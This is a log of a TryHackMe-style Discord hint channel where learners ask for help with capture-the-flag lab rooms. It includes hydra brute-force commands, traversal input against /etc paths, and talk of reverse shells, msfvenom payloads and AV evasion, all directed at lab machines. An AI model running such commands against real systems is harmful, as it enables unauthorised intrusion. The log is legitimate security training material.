#room-hints

1 messages ยท Page 2 of 1

digital edge
#

and the proxy should be on right when sending i assume?

#

yeah

digital edge
#

yes your right , this is my last room for the day otherwise ill pull my hair out. and thank you for being patient with me. im not leet like some of yall but i try and learn

exotic girder
#

hello

#

i need help with my burp suite i cannot load rockyou.txt

#

in payload

pallid moss
# exotic girder i need help with my burp suite i cannot load rockyou.txt

you don't want to load rockyou into burpsuite... the free version gets exponentially slower over time to prevent users from brute forcing with it. If you're using it for a room you likely have the wrong wordlist, and if you're just using it, you would probably be better off with a different tool

green minnowBOT
#

Gave +1 Rep to @pallid moss

silk zenith
alpine kestrel
silk zenith
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

split bloom
#

So Iโ€™m doing the Linux PrivEsc room and when I try to ssh in I get this back. ----> Unable to negotiate with 10.10.124.190 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

alpine kestrel
#

sniped by lassi again

split bloom
#

No... I thought the whole reason for joining the THM discord was to ask questions here for help?

split bloom
mild moth
#

Hello everyone I've just created my account and I'm starting the Jr pentester career ,, I'am actually at Web Application|content discovery|Manual Discovery - Framework Stack, I'm 99,9% sure i have given the good flag, after several tries I have finally checked on internet if my flag was the good one and I have also a positive answer, however it wont accept de flag. Would you have any hint about what should I do ? I tried to send a DM to THM and no success. Cheers

proud scarabBOT
cold eagle
mild moth
#

What do you mean by 'in spoiler', just write the flag here in the pattern you mentioned or there is a spoiler group specific for that ?

cold eagle
#

|| flag ||

mild moth
#

OK, so what i basically did was to go to the site ACME IT and i added /tmp.zip in the url to download the zip file and inside I found the flag which is ||THM{KEEP_YOUR_SOFTWARE_UPDATED}||

mild moth
#

jr penetration test / introduction to web hacking / content discovery

cold eagle
mild moth
#

ok thanks, i'll keep woorking

cold eagle
mild moth
#

i'll do itm cheers

#

just found it, thank you

#

it worked

dusk imp
#

Hm, would I be right in assuming that there's a docker escape needed in ohmywebserver after getting user?

fresh grove
#

Could someone give me a hint for the room Burp Suite Basics plz ?
I'm working on the question;

Take a look around the site on http://10.10.113.15/ -- we will be using this a lot throughout the module. Visit every page linked to from the homepage, then check your sitemap -- one endpoint should stand out as being very unusual!

Visit this in your browser (or use the "Response" section of the site map entry for that endpoint)

What is the flag you receive?

I've clicked on every single linked page and there's nothing showing in the site map that seems suspicious ?

lucid junco
fresh grove
#

@lucid junco I've clicked everything though......

#

I mean........ there is nothing left to click.

#

Is there a filter i might need to change or something @lucid junco ??

lucid junco
fresh grove
#

@lucid junco I think i found it........

#

<5yjR2GLcoGoij2ZK>

#

Is this the droid i'm looking for ?

tulip vortex
#

i am new and totally confused.
what is the answer of what do you need to access for web applications

lucid junco
lucid junco
fresh grove
#

I mean........ I found the suspicious end-point..

#

I will try to find the flag.

lucid junco
tulip vortex
#

its a question in learning section of try hack me and not able to get the answer
it can be web browser or server

lucid junco
#

web browser is too ||long|| ๐Ÿ˜‰

fresh grove
#

@lucid junco I have, there is no flag in there.

lucid junco
violet olive
#

task 8 john the ripper need help please haha

fresh grove
#

@lucid junco 404 not found.......

lucid junco
tulip vortex
lucid junco
tulip vortex
lucid junco
#

Count the number of * in the answer.

#

Is a clue to how long the and/or the answer format

lucid junco
tulip vortex
green minnowBOT
#

Gave +1 Rep to @lucid junco

fresh grove
green minnowBOT
#

Gave +1 Rep to @lucid junco

fresh grove
#

How does @green minnow decide when someone gets +1 Rep ?

violet olive
#

just wondering if im on the right track for task 8 john the ripper ive tried --rule["A-Z"]

pallid moss
fresh grove
#

@pallid moss Lol, thanks @pallid moss

pallid moss
tulip vortex
tulip vortex
fresh grove
#

@pallid moss Oh right....... Can i give myself +1 rep by thanking myself ?

#

@tulip vortex Thanks.........

#

lol

pallid moss
violet olive
#

what rule would we use to add all capital letters to the end of the word

#

now im thinking its [List.rules:"cAZ"]

fervent kayak
#

if it's regex based you'll need a $ at the end

#

I haven't done that one so it's really just something to consider โœŒ๏ธ

violet olive
#

yeah cheers

fresh grove
fresh grove
#

Would someone give me a hint for the Quotient room plz ?

#

I mean...... Do i need to break out of the sage account into the Admin account ?

pallid moss
violet olive
#

AZ"[A-Z]"

#

took me ages jesus lol

pallid moss
brave sentinel
#

i need hint after getting into ssh shell as alice on room wonderland

#

i can see a python file with sudo perm as rabbit

#

any hint?

languid isle
brave sentinel
#

(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

#

(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

languid isle
languid isle
brave sentinel
#

i want tjo do this on my own bro

#

i need some hint

languid isle
brave sentinel
#

thanks bro let me try

kind brook
#

Having some trouble trying to upgrade a reversd shell established via 2019-6714 (hackpark room)

Currently listening via msfconsole's multi/handler

certutils permissions seem to be barred for urlcache

0 feedback from powershell to check if a command is running, no luck thus far trying to pull from a local http server

Msfconsole upload - appears to be throttled to upload in 256b chunks and fails on the first chunk upload
(Attempts to send both an msfvenom payload exe and a netcat binary both failed)

Am i messing something up or is there an other means i should investigate?

kind brook
#

(attempting a session upgrade via shell_to_meterpreter also failing)

kind brook
#

Turns out powershell is very pedantic

#

was trying to wrap a command in brackets to enable doublequotes for strings, but it should have been doublequotes with single-quote for strings

pallid moss
restive bay
#

hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-26 15:36:14
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://10.10.10.6:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.10.10.6 - login "dale" - pass "123456" - 1 of

#

should i wait for this to be over or go on and search for the answer

#

coz its basically bruteforcing

raven escarp
fresh grove
fresh grove
#

Could someone give me a hint with the Overpass room plz ?

#

I'm trying this;
Cookies.set("SessionToken","anything")
I end up with this;
Uncaught ReferenceError: Cookies is not defined
<anonymous> debugger eval code:1
debugger eval code:1:9

#

Would someone plz give me a clue here, i'm not sure why this isn't working.......

flint creek
#

Guys can someone give me a hint with this Question.

What would be the name of the machine account associated with a machine named TOM-PC?

cold eagle
fresh grove
#

It worked like this the second time i tried it;
Cookies.set("SessionToken","anything")

fresh grove
#

hey @cold eagle would you help me trouble shoot something plz.........

#

I'm getting an error when doing the PrivEsc.........

cold eagle
fresh grove
#

Thanks @cold eagle

green minnowBOT
#

Gave +1 Rep to @cold eagle

fresh grove
#

+rep

jaunty canopy
#

Any nudge on zeno room please, iโ€™m stuck at the administrator login panel

jaunty canopy
#

Sqlmap?

mild moth
#

Hello, could someone give me a hint for the room "https://tryhackme.com/room/subdomainenumeration#", last ccommand it says to run "ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}", Edit the above command replacing {size} with the most occurring size value from the previous result and try it on the AttackBox, and according to them 2 results will be found, however all page sizes is 472, so when I type -fs 472 i have no answer I have only some lines that look like nothing for exemple ":: Progress: [453/1907] :: Job [1/1] :: 314 req/sec :: Duration: [0:: Progress: [454/1907] :: Job [1/1] :: 312 req/sec :: Duration: [0"

#

this is the ffuf results after using -fs 472

#

:: Method : GET
:: URL : http://10.10.29.136
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.acmeitsupport.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 472


:: Progress: [1907/1907] :: Job [1/1] :: 403 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

left thunder
mild moth
#

attackbox

left thunder
#

Is this your attackbox IP that you are fuzzing ?

mild moth
#

yep

left thunder
#

Ye, then that's wrong.
You have to start the target machine of that room

mild moth
#

๐Ÿ˜ตโ€๐Ÿ’ซ my bad,, thanks

weak epoch
#

Hi, I'm in the Firewalls room on task 1 and the last question is about allowing SNMP over SSH and which port should be permitted. I cant seem to find what port that should be, no material I've looked at has been any help

#

Nevermind I got it

alpine kestrel
#

was just about to refer you to some sources on it

steep oak
#

Hello friends so here I am doing this python room but I keep submitting what I think should be the answer but I keep getting error so Iโ€™m thinking, maybe I might be wrong and someone out here can save my ass, I think the answer should be ^^requests.get*

#

But THM says hell no stop playing boy

steep oak
#

You killed it fam

#

That was right and thanks

brave sentinel
#

i got stuck in enum stage on the room looking glass , i think there is a information disclosure vuln in ssh
(OpenSSH-7.6p1) any hint how to exploit it?

brave sentinel
#

you mean the custom exploits?

weak epoch
#

Hi, I'm in room Firewalls Task 7 Port Tunneling. If I'm understanding the task correctly it wants me to set up a listener on the web server on port 8008 with a command to forward traffic to port 25. So I submitted the command and tried to connect to the listener via a terminal and it just sits in limbo. No connection time out or refusal

#

Gonna try reloading the server but I bet its something I'm doing wrong

brave sentinel
#

there are so many ports are in open state and nmap show's service as ssh on every single port

weak epoch
#

Okay so I'm able to get a connection through ncat but I dont get a shell

#

And I can only get a connection from port 21, which is the previous task. It says port 8008 should work but its not for me

#

Okay I have a headache. Cant get the GET request to go through like I think it wants. Ill try later

alpine kestrel
worthy urchin
#

Anyone able to give a hint on Enterprise? I have two users, can RDP into the DC, have gathered some useful info through the hound but simply can't figure out what I'm missing on the lateral movement here.... ๐Ÿค”

#

Also have found the secret files but haven't been able to decrypt them...

worthy urchin
#

Nvm... I'm dumb... The vegetable helped me see what I was overlooking!

cosmic nimbus
#

anyone know how to do last part of task 3 in intro to digital forensics. I cant do the last command to get the camera model for cat ransom

#

nvm

serene badger
#

heya, need some help or hints for challenge 1 of the file inclusion room

#

||using burp to change GET to POST and tried ../../../../etc/flag1 but no response with the flag yet||

left thunder
serene badger
#

will try that

#

that worked

#

so it was wrong header that messed this up?

left thunder
serene badger
#

got it, thanks

dusky plinth
#

Hey i am currently doing the "Linux Privilege Escalation" room. I have some problems with Task 7. There i need to escalate privileges with the SUID bit.
I tried GTFOBins but i do not find any working one. I also thought about cracking a password, but i cant read the /etc/shadow which i need for john the ripper. Does anybody can give me a hint?

cold eagle
weak epoch
# alpine kestrel why are you inputting the target machine ip in the command instead of the attack...

Oh I didn't understand what they meant by using "local host" with the forwarding so I used the target IP again. Figured that out but that wasn't my only problem. Managed to find some obscure help online, not sure which fixed my problem but adding -nv to my nc argument on my machine and during the GET request changing the the spelling of "default" to "defalt" which ever did it I got the page ๐Ÿ˜…

languid isle
dusky plinth
#

hmm okay, thanks i will have a look again

green minnowBOT
#

Gave +1 Rep to @burnt rivet

dusky plinth
#

okay, i am dumb xD. I already saw and tried it, but i did not used a single brain cell^^. now i've got the task.

hexed jasper
#

howdy folks. I'm in the /networkservices room, task 6 where I'm enumerating a telnet(?) server. Except nmap isn't working for me. I'm showing only closed ports, and when I try to run nmap -p- [IP] it just hangs. Any ideas?

#

I'm assuming I'm using the wrong options for nmap, but after trying for a few days I could use a tip.

alpine kestrel
alpine kestrel
hexed jasper
#

ahh yes, seeing the remaining time is great, thanks a lot @alpine kestrel !

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem

hexed jasper
#

and I've already found my first open port. That was clearly the ticket. Notes have been made for the future haha

#

is there any tip on when to use sudo with nmap? should i just always use it?

alpine kestrel
#

now that you found the open port you can do sudo nmap -sC -sV -vv -p portnumber ip

alpine kestrel
hexed jasper
#

right okay. I remember reading something about that needing direct socket access or something, i.e. needing elevated permissions. thanks times two @alpine kestrel

alpine kestrel
#

would recommend the nmap module to learn a lot of this: https://tryhackme.com/module/nmap

civic sedge
#

I really liked the nmap room

#

A lot to learn

alpine kestrel
#

well there is the further nmap room.... which is decent... then there is this module on nmap which has multiple rooms and goes even more in depth

compact wren
#

Kenobi
I stuck here can someone give me clue how should i implement "mod_copy.py" rce to ftp server ?

#

Is it possible rce ?

#

@burnt rivet Thanks

green minnowBOT
#

Gave +1 Rep to @burnt rivet

tropic silo
#

Hey guys, I'm doing the Burp module (scoping and targeting task) and I'm instructed to add http://MACHINE_IP/ into scope and change the Proxy settings to only intercept traffic to in-scope targets so as to See the difference between the amount of traffic getting caught by the proxy before and after limiting the scope.

#

My question is:

#

Where can I see this difference? I've been moving back and forth between the dashboard, target, and proxy tabs but i don't see any changes in anything.

lucid junco
#

Have you started the machine, yes?

tropic silo
#

Burp is def proxying traffic i just don't see how proxy > options > intercept client requests > and URL is in target scope is changing anything or where I am supposed to look for these changes.

tropic silo
#

Ah ok I get it now, I had to drop or forward the packets in order to see the other requests in the intercept queue facepalm
I was expecting to see a complete view of all requests being made.

astral badger
#

Walking an application room, I need to find a flag in a directory, where can I find the directory?

astral badger
#

I checked the sources but there isn't any file named flag.txt, am I doing something wrong?

lucid junco
#

You need to look in the directories.

astral badger
#

So, in the room it is assumed that we know where the directory is? This was confusing even after searching on the internet, but thanks!

green minnowBOT
#

Gave +1 Rep to @dusk totem

languid isle
astral badger
green minnowBOT
#

Gave +1 Rep to @languid isle

languid isle
slow warren
#

In the room Chosen Undead I couldn't think of anything besides || typing the Sha-1 hashes of frampt and kaathe there respectively. || The collide button rings some bells as well but I don't have anything else, anyone got a clue?

astral badger
languid isle
#

but obviously as the name ||assets||, this should be a place to store stuff

astral badger
languid isle
languid isle
#

unless they have random string name directory

green minnowBOT
#

Gave +1 Rep to @languid isle

azure viper
#

hi

#

need help with a question.

#

An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

#

its the highest but its not the asnwer..

#

nvm got it

sharp geode
#

hello all I am doing Break Out The Cage machine,

#

and i found the following string "UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKR
Wxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQS
B5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds" ,and after base64 decoding it becomes the folloing:

#

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.

Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

#

i have tried rot13 with rotations but no results, any help ?

alpine kestrel
#

rot47????

sharp geode
#

it becomes with characters and numbers, it doesn't work

lucid junco
#

It could be done with something else after.

sharp geode
#

any ideas ?

#

to where possibly could be done ?

alpine kestrel
#

figured it out

#

got the clear text of the above now

#

hint hint: ||Vigenere|| @sharp geode

sharp geode
#

it need a key for decoding, i am gonna look for it

alpine kestrel
#

if you can't find it try the brute force approach

sharp geode
#

i will try both ways, thanks a lot

alpine kestrel
#

no problem

alpine kestrel
#

nope sorry no idea

alpine kestrel
# slow warren any thoughts on this?

also can't find that room when searching for it on tryhackme so either it is a private room or it was given to you for home work which means we should not really help you

sharp geode
alpine kestrel
#

Good job you got it now

slow warren
#

I dont think it is a private room as I just searched through subscription only challange rooms that I have not completed and found it, nor do I think it is a homework since I didn't enroll in such educational programs

sharp geode
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

slow warren
#

Gonna send it in a second

sharp geode
#

i couldn't *

alpine kestrel
#

that link will let shadow check if the room is private or not

alpine kestrel
slow warren
#

wow I searched for it and didn't get any results as well, but luckily I could find it through an open tab

alpine kestrel
#

yeah that room is marked as private now

#

guess it is either getting archived and removed or updated

slow warren
#

The room started pretty neat but not being able to get to the actual content because of incompetence in riddle solving kinda annoys me

alpine kestrel
#

well guess the room is not done yet and has yet to be released.... it is only 230 days old when most rooms are over 400 days old when they become public

slow warren
#

That might be the case as well but I'm still craving for an answer for that riddle, though I'm probably gonna drop the room

alpine kestrel
#

well no writeups either so can't really help you without trying themselves and don't feel like doing that on a private room that has yet to be released

slow warren
#

seems like that but thanks for the effort anyways

alpine kestrel
#

no problem

white salmon
#

any hint on priv esc for MindGames room?

#

ive used linpeas

#

and got a public exploit

#

but it is not working as it needs ssh shell

#

despite generating ssh keys , sssh requires password

stuck fractal
#

Whatever it is, it doesn't need ssh

white salmon
#

i tried cve-||\2021-4034||

#

no other clues so far

#

also there is a executable in home users directory

#

and its being called by system

stuck fractal
#

Linpeas will highlight it.
It's kinda like ||suid bit but a lot more granular.||

crude basin
#

hey, i have a trouble in the msfRoom at msfvenom part
when the handler is set, i try to run the reverse-shell, but when i press enter key, the session close
any idea ?

proud scarabBOT
chrome helm
#

hello everyone.
Tell me please
What are my first steps towards getting an NTLM hash in the Blueprint room?
Somehow a lot of information:
There is also a website on port ||8080||
There are SMB directories.
I can upload a file via SMB
I understand I need to catch a hash
||Responder|| (that's just through what)
But what should I do first?
Something should be simple and banal
which is clearly related to the resource on the site via port ||8080||
(a room from the easy series)
I'm in a stupor=)

sharp geode
#

hello all, I doing IDE room, and i found a login page on port 62337, and found a username say "alex" and got other information from Burp request, so i crafted a hydra brute force attack on the login page as following:

#

hydra -l alex -P /usr/share/wordlists/rockyou.txt 10.10.216.124 -s 62337 http-get-form "/index.php username=^USER^+&password=^PASS^&theme=default&language=en:f = invalid' -V"

#

but an error occurs: the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: f = invalid' -V

#

any help ?

#

sorry it's as follows: hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.216.124 -s 62337 http-get-form '/index.php username=^USER^+&password=^PASS^&theme=default&language=en' -V

kind brook
#

Is it missing a colon to segment the index.php and username=^ params?

#

e.g.
http-get-form "/index.php:username=^USER^+&password=^PASS^&theme=default&language=en:<failure string>" -V

sharp geode
#

hello again, currently I am doing Dav room, only port open is 80, checked the source page and nothing useful, i found a directory /webdav but needs credentials , which there is no information about them what so ever, ideas ?

grand lintel
#

Can I get some help with the HOLO network. I am at task 36. For some reason mimikat wont run properly. I do have what I did documented. Any help
would be great.

alpine kestrel
grand lintel
#

roger that thanks jedi

compact wren
#

Hi, I'm in Daily Bugle room but i can't find the Joomla version. Can someone give me a little hint ?

cold eagle
wet hawk
#

What setting name that allows you to modify the Host header in a Meterpreter payload?
Can't find it anywhere

brave sentinel
#

i'm getting this error while connecting to ssh on lookingglass room

#

Unable to negotiate with 10.10.176.51 port 13789: no matching host key type found. Their offer: ssh-rsa

pallid moss
#

I'll add a note to the room as well

#

Actually, @stuck fractal that's your room, are you happy if i put that as a hint?

brave sentinel
#

ssh -oHostKeyAlgorithms=+ssh-dss -p 9100 10.10.176.51
Unable to negotiate with 10.10.176.51 port 9100: no matching host key type found. Their offer: ssh-rsa

brave sentinel
#

ohhh okay

#

thanks dude now it's working

languid isle
#

+rep @pallid moss

green minnowBOT
#

Gave +1 Rep to @pallid moss

stuck fractal
vagrant heart
#

It also should be "THM@\!" because ! is a special character, but the length of the answer should be 5

vagrant heart
#

Thank! So tired I didn't even understand properly what it meant ๐Ÿ˜…

green minnowBOT
#

Gave +1 Rep to @burnt rivet

jolly inlet
#

What setting name that allows you to modify the Host header in a Meterpreter payload?

#

and the hint is less than worthless

jolly inlet
#

nm i solved it

tawny kiln
#

What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers?

#

any hint on this

jovial meteor
#

hi sandbox evasion task 4 last question. Which evasion technique involves burning compute-time to escape the sandbox?

#

any nudge

pallid moss
tawny kiln
#

runtimedetectionevasion stuck on task 6 any hint why my code is not working

#

the term is not recognized

brittle atlas
#

i dont understand i split the file shell.exe in the signature evasion but i cannot find the kibibyte any advice ?

#

i dont understand the question i think

pallid moss
brittle atlas
#

oh okay

alpine kestrel
#

any hints on red team opsec task 7??? first part???

#

shadow can't figure it out

lucid junco
#

The number order?

alpine kestrel
#

yuups

#

lets wait as robert stated it might be redesigned

lucid junco
#

It will be yeah, but you can brute force it

alpine kestrel
#

sorry for sending the same question in 2 channels

alpine kestrel
pallid moss
brittle atlas
#

ok thanks robert i was just having the not good kibibyte

#

if my file is considered already uploaded what can i do ?

sage cloak
#

hello

#

Any hints please : )

alpine kestrel
sage cloak
#

yes

alpine kestrel
#

the things highlighted in blue is what is being used.... the rest is just there to show other things that could be used @sage cloak

sage cloak
#

๐Ÿ˜…

alpine kestrel
#

you can also scroll up and down

sage cloak
#

yes

#

could it be this ?

alpine kestrel
#

have you tried that???

#

if you do you would know

sage cloak
#

idk what to type lol

#

system Binary ? or is it one of those

alpine kestrel
#

try rundll32 as the middle question answer

#

or you could check the att&ck framework for what the differnt thingies kinda mean

alpine kestrel
#

your emoji/emote names are so weird to shadow

sage cloak
#

Its just random numbers ๐Ÿ˜…

#

Heart is for thanks, it was the answer inferno needed

#

The frog is inferno blush

#

๐Ÿ˜…

alpine kestrel
#

you will get better at using mitre over time

sage cloak
#

I hope so ๐Ÿ™

#

I still need to figure out 2 questions Black_Movie_42

alpine kestrel
#

the first question is basicly just looking how many blue boxes there are under one of the groups of things

sage cloak
#

i tried

#

but didn't work

alpine kestrel
# sage cloak i tried

it is not 16 if that is what you tried... but if you scroll up and down when looking at that it should be obvious how many thingies there are under it

sage cloak
#

Huh ? I counted the blue boxes myself its 16

#

Maybe something specific ๐Ÿค”

burnt ibex
#

Can someone help me with Obfuscation Principles task 8? I got stuck on obfuscation.

alpine kestrel
#

if you check only the stuff that is below command and control.... how many blue boxes???

sage cloak
#

16 what the hack

alpine kestrel
#

not the number that is stated there.... the blue boxes

#

can you show an image???

sage cloak
alpine kestrel
#

yeah see there is only 2 blue coloured boxes

sage cloak
#

ah Multi is in both ss

sage cloak
#

What

#

Omg

#

Iam soo stupid

#

Enough try hack me for tonight

alpine kestrel
#

lmao

sage cloak
#

Thanks for the help shadow

alpine kestrel
#

no problem

sage cloak
#

+rep @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

sage cloak
#

:)

alpine kestrel
#

you made shadow laugh.... that is a good reward

sage cloak
#

Glad to hear : )

tired nebula
#

hello guys

#

i was playing room/cyborgt8 , but i got stuck in privilage escalation, any hints..?

modest orchid
#

Hi! I'm doing the red team threat intel room on task 7. I cannot find where I'm supposed to get the last answer for the static website thing. Any hints are welcome

placid plume
#

hey guys ,who know the commend for connecting win via rdp in linux?

gentle fulcrum
left thunder
#

Oh, the answer for the static site, nvm my answer then ๐Ÿ˜„

wraith scarab
#

Having the same issue!

left thunder
wraith scarab
left thunder
wraith scarab
wraith scarab
green minnowBOT
#

Gave +1 Rep to @left thunder

cinder wyvern
#

have created and uploaded so many undetectable reverse shell payloads, av evasion is successful but somehow not getting shell back on my listener

gentle fulcrum
# modest orchid Yes

If youโ€™re looking at the MITRE ATT&CK Navigator, if you scroll towards the right side of the screen there is a category for Exfiltration and another for Impact

modest orchid
#

This is what I've got so far but I can't for the life of me tell whats wrong

#

Am I basing it off of the wrong one? I'm going off of 41

white salmon
#

i get urlmon.h no such file or directory, in the sandbox evasion room

#

any help?

gentle fulcrum
# modest orchid This?

Yep, that! If you move all the way to the right you should see the sections youโ€™re looking for

modest orchid
gentle fulcrum
sage cloak
#

Its been 30 minutes PeepoSadRain

sage cloak
#

can u help me with this one

modest orchid
white salmon
#

How come they both have the same IP address?

#

oh

#

just making this clear, all devices on a network use the same public IP address?

stuck fractal
#

This is part of NAT

umbral umbra
white salmon
#

wow they giving misleading info in the rooms ๐Ÿ˜ฑ

umbral umbra
#

They aren't. As intro level material, it's normal to reduce the amount of real-world complications to make the content understandable.

white salmon
white salmon
#

"usually all devices on one network use the same public IP address"?

stuck fractal
#

You're going to hate me for this but... They're your notes.

#

Understand the content, distill it.

white salmon
#

so i can maybe then understand to make better notes

white salmon
honest zodiac
#

im need help for that question

#

(What technique's purpose is to exploit the target's system to execute code?)

#

i really don't know how to pass it

trim badger
#

what module are you in?

honest zodiac
#

red team

trim badger
#

under the column "purpose"

#

you'll find the answer

honest zodiac
#

like ned for execude the code right

#

nned

#

need*

trim badger
#

the answer is on the chart

honest zodiac
#

purpose

trim badger
#

there's 3 columns. the middle column shows the question, word-for-word

#

on the chart*

honest zodiac
#

yeee

#

thanks a lot

trim badger
#

if you ever get stuck, re-read

honest zodiac
#

yeah i know but im not really good at eng

#

i have 15y did u think its too late if learn now basic staff?

honest zodiac
left thunder
honest zodiac
#

yeah idk when need to start

trim badger
#

I'm 35. just started 6 months ago. you're never too old

#

as long as you're passionate about it and about learning/researching and reading.

you'll be fine

honest zodiac
#

ohh thx

#

i want to become the best of the best

trim badger
trim badger
#

tireless work

honest zodiac
#

i know but i want so hard

trim badger
#

that's good man ๐Ÿ™‚

#

keep working

honest zodiac
#

thx

trim badger
#

start with the beginner modules

honest zodiac
#

i already know the beginer staff like linux

trim badger
#

oh good

honest zodiac
#

i know how to cod im py

trim badger
#

i would still definitely do the early modules though. it will engrain basic web technologies, networking and other concepts

honest zodiac
#

i do it

#

like nmap and linux

#

its was easy but one my frined told me to do the red team

trim badger
#

without them you'll quickly get lost when faced with techniques that are new to you

trim badger
honest zodiac
#

ok

#

what are u traniing now?

#

traning

trim badger
#

common active directory exploits rn

honest zodiac
#

yooo

#

GG

honest zodiac
#

(
What is the first access type mentioned in the document?)

#

i re read evry thing

vestal mural
#

can someone give me a nudge on "sandbox evasion" challenge?

modest orchid
#

I'm stuck on the Red team threat intel room task 7 question 2 and I have no clue where I'm supposed to be looking. Any hints?

plain mica
#

can someone help me with Evading Logging and Monitoring Room I cant get the flag I remove all the logs and disable powershell login but I still get

finite anchor
#

I'm stuck with the file inclusion lab challenge 3. I can't seem to figure out how to get the path null-terminated and I haven't found out any other character to insert here by googling. The hint says it is using PHP $_REQUEST but it appears populating the variable with cookies have been turned off from the php configuration (which is the default setting) so I can't use that and I'm only able to use GET and POST

iron shadow
#

Hello, I'm doing the room Vulnet EndGame, I was able to dump the database but I'm stuck.
Any help please

sharp geode
#

hello everyone, I am doing Phishing Emails 5 room, and there is "challenge.eml" file to investigate it in a "Show View Split" machine, i tried to copy the content of the file, but it's too large to copy, and tired to wget python server on my machine and it also doesn't work

#

so can someone please send me the file, so i can do the challenge

iron shadow
#

Don't mind, I found something ๐Ÿ™‚

sharp geode
#

i found a found a solution

honest zodiac
#

hey im need help for red team

#

(What is the first access type mentioned in the document?)

#

this is the question pls help me

light ocean
sullen palm
#

DM

iron shadow
#

Hello. I'm doing vulnnet endgame, I'm looking for the CMS but I wasn't able to find it.
Can I have a hint please?

iron shadow
#

@burnt rivet thank you

green minnowBOT
#

Gave +1 Rep to @burnt rivet

devout stream
#

Just made me think of that haha โค๏ธ

honest zodiac
#

hahaha

devout stream
#

but yeah keep at it brother, also check out some of the streamers that do this stuff... Lots of good insight / it's nice to feel part of a community

frail sapphire
#

I am stuck on this room: https://tryhackme.com/room/passwordattacks

The question is: What would the syntax you would use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?

The hint is: Az"[0-9][0-9]" ^[**] = Example: @password80

I know some regex and I've followed the room but I have no idea what that question even means.

lucid junco
#

||The hint is so close to the answer.||

frail sapphire
lucid junco
#

It's asking for you to create a rule.

dusk imp
#

I'm a little lost on inferno, I have the foothold but I can't work out how to get from foothold to user.

dusk imp
#

i'm just stuck as www

#

login, and shell.

#

also persistence shell.

lucid junco
#

Have you seen the ||poem|| ?

dusk imp
#

the one on the main page of http?

#

or the many references to it

#

to answer your question, no.

lucid junco
#

||downloads||

dusk imp
#

oh yeah. I've seen a few things there

#

guess I should look at them

lucid junco
#

Send a screenshot ๐Ÿ˜„

frail sapphire
#

The rule is supposed to be: ||^[!@?][aZ][0-9][0-9]$|| if I an not mistaken. But I fail to put it into john syntax

dusk imp
lucid junco
#

However. You're not ||#seeing everything||

#

๐Ÿ˜‰

dusk imp
#

I know I am, but it's punching me in the face.

#

OOOHH

#

sneaky.

#

IT WAS LITERALLY PUNCHING ME IN THE FACE

#

HOLY CRAP

lucid junco
#

๐Ÿ˜‚

dusk imp
#

I even tried to ssh-keygen my own user for www-data ๐Ÿ˜›

frail sapphire
#

Ok I got it. Face -> table. What a strange syntax.

#

Not going to befriend this one

#

Ty for the help.

rancid arrow
#

Hello in active directory basics

#

In sub module managing users in AD

#

How can I access the Phillip's computer

exotic girder
exotic girder
#

or split view

frail sapphire
rancid arrow
rancid arrow
#

What was the flag found on Sophie's desktop?

#

To change the creds of sophie

#

We need to login as phillip

#

After that by using powershell phillip will change the Sophie's password

#

And after that in order to login to Sophie's desktop I need to know how can I firstly change my administrator account and login as phillip

#

After that how can I log in as Sophie in order to get that flag on that Rey hack me windows machine

#

This is the question of active directory basics beginner path

halcyon blaze
#

Anyone stuck at evading loggin and monitoring ?

rancid arrow
exotic girder
rough tulip
#

Oke, can someone give me a hint on Obfuscation Principles, task 5, question 2 : What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees?

rancid arrow
long falcon
#

I'm trying to do task 29 of the OWASP Top 10 room and I'm not quite sure what to exploit. I've looked at a few things, logged in as admin, found apache version and openssh version (with nmap) but I haven't found any exploits yet. Could someone give me a hint on where I should be looking?

long falcon
